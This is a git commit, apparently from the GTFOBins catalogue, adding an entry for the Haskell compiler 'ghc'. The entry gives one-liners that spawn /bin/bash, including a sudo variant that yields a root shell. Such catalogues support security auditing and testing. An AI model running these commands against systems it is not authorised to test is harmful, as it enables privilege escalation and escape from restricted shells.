Add ghc binary

This commit is contained in:
Ryan Saridar 2020-10-22 17:20:23 +01:00 committed by Andrea Cardaci
parent a49cccf7da
commit 106dede9da

7
_gtfobins/ghc.md Normal file
View File

@ -0,0 +1,7 @@
---
functions:
shell:
- code: ghc -e 'System.Process.callCommand "/bin/bash"'
sudo:
- code: sudo ghc -e 'System.Process.callCommand "/bin/bash"'
---